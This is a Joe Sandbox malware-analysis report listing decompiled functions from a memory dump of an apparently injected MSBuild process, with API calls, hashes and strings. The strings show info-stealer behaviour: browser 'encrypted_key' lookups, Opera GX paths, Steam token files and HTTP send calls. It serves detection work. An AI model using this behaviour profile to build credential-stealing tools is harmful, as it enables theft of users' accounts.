Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: HttpInternet$OpenRequest$ConnectInfoOptionQuerySendlstrcpy
String ID: ERROR$ERROR
API String ID: 3086566538-2579291623
Opcode ID: c006aa10760bc954efd806e84495a2d06b24e97a73256d69b96c1a27bfc4838e
Instruction ID: fa6cd13a443083575c3a824eeb1e5676c961334a8f4b47820412c2fdc9a040c1
Opcode Fuzzy Hash: c006aa10760bc954efd806e84495a2d06b24e97a73256d69b96c1a27bfc4838e
Instruction Fuzzy Hash: 6F014F75A00118ABCB20FB76D9469CD73A96F04308F55417BBC24E3293E7B8E9494AD9

Function 00416FA7 Relevance: 4.6, APIs: 3, Instructions: 70sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000003E8,?,?), ref: 0041700E
CreateThread.KERNEL32(00000000,00000000,00416ED6,?,00000000,00000000), ref: 00417046
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 0041704E

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: CreateObjectSingleSleepThreadWait
String ID:
API String ID: 4198075804-0
Opcode ID: 1c6142cbbd9849c9f35e06356520fbbbc19007ee5fb9fef6d8df9f607a11363d
Instruction ID: 6ddc57dea45eff21f3b413cd8a29bb57df9be50e409c6c2ee2748a51ac3a6ecc
Opcode Fuzzy Hash: 1c6142cbbd9849c9f35e06356520fbbbc19007ee5fb9fef6d8df9f607a11363d
Instruction Fuzzy Hash: E6217832900229ABCF10EF96EC419DE7BB9FF44358F10402BF904A3150D738AA86CFA4

Function 00412446 Relevance: 4.5, APIs: 3, Instructions: 41fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00414A8D), ref: 00412460
WriteFile.KERNEL32(00000000,00000000,00414A8D,00414A8D,00000000,?,?,?,00414A8D), ref: 00412487
CloseHandle.KERNEL32(00000000,?,?,?,00414A8D), ref: 0041249E

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID:
API String ID: 1065093856-0
Opcode ID: 618600667c8334e05266c7920bfcba6b014638909509334c775888355d968c7c
Instruction ID: a587d297adf89e60fa6946fdd7da6f666782c0f167f87b21f29bcfda1cd19bad
Opcode Fuzzy Hash: 618600667c8334e05266c7920bfcba6b014638909509334c775888355d968c7c
Instruction Fuzzy Hash: 84F02471200118BFEF01AFA4DD8AFEF379CDF053A8F000022F951D6190D3A58D9157A5

Function 00410C85 Relevance: 4.5, APIs: 3, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
RtlAllocateHeap.NTDLL(00000000,?,?,?,00401385), ref: 00410C98
GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Heap$AllocateComputerNameProcess
String ID:
API String ID: 1664310425-0
Opcode ID: 223c93d772ac102104f3d80f3225d4df8625dfe3dc4c13cc38eb63403da552c2
Instruction ID: 4a48e0897f6a5e53a67cc5d7e0c14adbc6ce47083a4b6c26751418be0e4428b5
Opcode Fuzzy Hash: 223c93d772ac102104f3d80f3225d4df8625dfe3dc4c13cc38eb63403da552c2
Instruction Fuzzy Hash: 2DE08CB1200204BBD7449BD9AC8DF8A76BCDB84715F100226F605D6250EAB4C9848B68

Function 0040C95C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 286COMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

StrCmpCA.SHLWAPI(?,Opera GX,00436853,0043684B,?,?,?), ref: 0040C98F

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004176F9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417731), ref: 00410538

Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99

Part of subcall function 0040819F: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5

Strings

Opera GX, xrefs: 0040C97F

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
String ID: Opera GX
API String ID: 1719890681-3280151751
Opcode ID: 0fb41c61df57f504aaf5de9142bc873bfa384d999c6abac19d8a053c1ed93182
Instruction ID: 2f838092edd703084741f82f1e37e62fc4a331bb811b3281c0e98dae42c078f1
Opcode Fuzzy Hash: 0fb41c61df57f504aaf5de9142bc873bfa384d999c6abac19d8a053c1ed93182
Instruction Fuzzy Hash: 3FB1FD7294011DABCF10FFA6DE425CD7775AF04308F51013AF904771A1DBB8AE8A8B99

Function 00407B0B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,00000002,00000002,?,?,?,?,00407C56,?), ref: 00407B8A

Strings

, xrefs: 00407B5D

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-3916222277
Opcode ID: 12037c8daa12d7fcab0069a5037541411d8429e4b00213a69a2087787070dd30
Instruction ID: 7cbd0eafb3405f1822ca0081af98c781be9845726f70e814ec0c9ffce599534c
Opcode Fuzzy Hash: 12037c8daa12d7fcab0069a5037541411d8429e4b00213a69a2087787070dd30
Instruction Fuzzy Hash: 14119D71908509ABDB20DF94C684BAAB3F4FB00348F144466D641E32C0D33CBE85D75B

Function 004170C7 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 45stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

lstrlenA.KERNEL32(?), ref: 0041710E

Part of subcall function 00416FA7: CreateThread.KERNEL32(00000000,00000000,00416ED6,?,00000000,00000000), ref: 00417046
Part of subcall function 00416FA7: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 0041704E

Strings

Soft\Steam\steam_tokens.txt, xrefs: 0041711E

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
String ID: Soft\Steam\steam_tokens.txt
API String ID: 502913869-3507145866
Opcode ID: cc6fcce903024a9fea6a23bafcd441d12855246dee4bda35170fe48c24b99249
Instruction ID: 271d1becf7a3678e07a024325e19a0bcf1d7841c1b1dc1186d3e3fa3453cba64
Opcode Fuzzy Hash: cc6fcce903024a9fea6a23bafcd441d12855246dee4bda35170fe48c24b99249
Instruction Fuzzy Hash: BA017531E0010867CF00FBE6DD478CD7B74AF04358F504136FA0073152D778AA8A86D5

Function 00411E1F Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37

Strings

1iA, xrefs: 00411E47

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID: 1iA
API String ID: 3494564517-1863120733
Opcode ID: ab387d88e84e58f7ee09dd024291177f022f73d374550d18fdbda7562f7ae9e7
Instruction ID: dc66f3ebc75c526b8f29ca666c763a1a9938aadc44e5483d7dab6bcf02b3e8fe
Opcode Fuzzy Hash: ab387d88e84e58f7ee09dd024291177f022f73d374550d18fdbda7562f7ae9e7
Instruction Fuzzy Hash: 08E02B3AA41B201FC7724BAA8804AB7BB5A9FC2F61B18412BDF49CB324D535CC4182E4

Function 00410FBA Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 00410FD4
wsprintfA.USER32 ref: 00410FEC

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: 998f64295720f10c821e057b3243b12a1334f63cbf789cdccd19e786a3f5f674
Instruction ID: 6ece5ee49d11cdb060b7bdfc3a79890b10628a8e35908506f9dd9848dd200c5c
Opcode Fuzzy Hash: 998f64295720f10c821e057b3243b12a1334f63cbf789cdccd19e786a3f5f674
Instruction Fuzzy Hash: 63E092B1D1020DABCF04DF60EC459DE77FCEB08308F0054B5A505E3180D674AB888F44

Function 00409072 Relevance: 2.7, APIs: 2, Instructions: 163stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

lstrlenA.KERNEL32(?), ref: 00409209
lstrlenA.KERNEL32(?), ref: 00409224

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004176F9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 718311eb3050d98c9a531c4c409263d505852a46ec7b88af86700a363608c163
Instruction ID: 7980a2431a17434d4a9fc19140cc267ce1297f5f23c66c0477910a4dd415bd4c
Opcode Fuzzy Hash: 718311eb3050d98c9a531c4c409263d505852a46ec7b88af86700a363608c163
Instruction Fuzzy Hash: 5A513D71A00119ABCF01FBA5EE468DD7775AF04309F50002AF500B71A2DBB8AE898B99

Function 004077F8 Relevance: 2.6, APIs: 2, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00003000,00000040,00000000,?,?,?,00407C18,?,?), ref: 0040784A
VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00407874

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c062e49b8eac24d7b45a027ae12e9eff25198202155d78bc8260cd663ae55519
Instruction ID: 58502b0b00c881bab5b754626ee9ce4ad9b10c36d9ff74d45ae59ae86afa5875
Opcode Fuzzy Hash: c062e49b8eac24d7b45a027ae12e9eff25198202155d78bc8260cd663ae55519
Instruction Fuzzy Hash: C311B472A44705ABC724CFB8C989B9BB7F4EB40714F24483EE54AE7390E274B940C715

Function 0041CCCB Relevance: 2.5, APIs: 2, Instructions: 39COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 0041CCDC

Part of subcall function 0041BC7F: lstrlenA.KERNEL32(?,0041CCED,0041CD8F,00000000,06400000,00000003,00000000,0041768F,.exe,00436C5C,00436C58,00436C54,00436C50,00436C4C,00436C48,00436C44), ref: 0041BCB1
Part of subcall function 0041BC7F: malloc.MSVCRT ref: 0041BCB9
Part of subcall function 0041BC7F: lstrcpyA.KERNEL32(00000000,?), ref: 0041BCC4

malloc.MSVCRT ref: 0041CD19

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: malloc$lstrcpylstrlen
String ID:
API String ID: 2974738957-0
Opcode ID: 4595bf6652bd861db47711c07eba1f475a4793355c0293ea92a90e9bc1e457ce
Instruction ID: fcaced55c1c361c3e27715ea7ae3a17afdad1615e326a9d39dd71d0aa4f9bcfc
Opcode Fuzzy Hash: 4595bf6652bd861db47711c07eba1f475a4793355c0293ea92a90e9bc1e457ce
Instruction Fuzzy Hash: 6BF0F0721412166BDB206F6AEC8098BBB94EB457A0F150037FD0997351EA38CC4086F9

Function 004185BE Relevance: 1.6, APIs: 1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cd0dd478d9f607c979a352132b68459f789e2a2a0c4ffcb15ea7dc3a842640c
Instruction ID: c1de0727e8417f3a856ade1607230127397a68712c8c4452783f7dfbc6220367
Opcode Fuzzy Hash: 1cd0dd478d9f607c979a352132b68459f789e2a2a0c4ffcb15ea7dc3a842640c
